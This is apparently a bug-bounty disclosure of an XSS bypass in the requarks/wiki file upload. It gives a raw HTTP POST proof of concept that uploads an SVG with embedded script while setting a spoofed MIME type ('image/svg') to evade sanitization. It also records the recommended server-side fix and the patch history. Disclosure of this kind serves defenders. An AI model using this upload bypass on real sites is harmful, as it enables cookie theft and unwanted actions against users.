Cross-site Scripting (XSS) - Reflected in requarks/wiki

Valid

Reported on

Dec 20th 2021


Description

SVG sanitization is incomplete. Attackers can bypass the fix in https://github.com/Requarks/wiki/security/advisories/GHSA-3qv4-gp35-rgh7 to perform XSS via malicious SVG files.

Proof of Concept

The fix commit sanitizes an upload only if its MIME type is image/svg+xml. Unfortunately, that MIME type is supplied by the user in the POST request, so an attacker can change it (from image/svg+xml to image/xxx) to bypass the sanitization check.

POST /u HTTP/1.1
Host: 10.0.2.4:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.2.4:3000/e/en/home
Content-Type: multipart/form-data; boundary=---------------------------51434357737717624032908586947
Content-Length: 729
Origin: http://10.0.2.4:3000
Connection: close
Cookie: jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiZW1haWwiOiJhZG1pbkBhZG1pbi5sb2NhbCIsIm5hbWUiOiJBZG1pbmlzdHJhdG9yIiwiYXYiOm51bGwsInR6IjoiQW1lcmljYS9OZXdfWW9yayIsImxjIjoiZW4iLCJkZiI6IiIsImFwIjoiIiwicGVybWlzc2lvbnMiOlsibWFuYWdlOnN5c3RlbSJdLCJncm91cHMiOlsxXSwiaWF0IjoxNjM5Njc3NTkxLCJleHAiOjE2Mzk2NzkzOTEsImF1ZCI6InVybjp3aWtpLmpzIiwiaXNzIjoidXJuOndpa2kuanMifQ.lhEkYJre3SyUa00LACOrLKGgPDJdCol2gs9lI0IPr0VSAaS1x5jIsbhe4DOBeloQDKz2fcJtM8et_FnuKsbW-zKm8BOuE2B0WaAg-fDZ_bAJLAh3qpaYSjO-sYqcgyA6VPLWz595r3ogI_3t7AfjGDaUXpJrheOeN1BE3DQdGDl4SPVV5QbPtl5lm0EDzCdMDNVvr_Ur6MFiE8bhcmf1n8Hyk37FImbVY57Rn503at-XEl--lSqCRT-6KbWAGZ3XWPymoZPRuzTOnVMWw5cnoIoKIpJLnZz3kSsZA0TPsl5SiM6vU5bizPXkSzO8RfxghZoHMvNerBvbyFFKPOhecQ

-----------------------------51434357737717624032908586947
Content-Disposition: form-data; name="mediaUpload"

{"folderId":0}
-----------------------------51434357737717624032908586947
Content-Disposition: form-data; name="mediaUpload"; filename="pwned.svg"
Content-Type: image/svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('SVG PoC');
   </script>
</svg>
-----------------------------51434357737717624032908586947--

Impact

This vulnerability is capable of stealing users' cookies and performing unwanted actions on the site via XSS.

Recommended Fix

The MIME type should be validated on the server side, rather than trusting the value supplied by the client.

Nicolas Giard validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nicolas Giard marked this as fixed in 2.5.264 with commit 57b56d 2 years ago
Nicolas Giard has been awarded the fix bounty
This vulnerability will not receive a CVE
assets.js#L102-L103 has been validated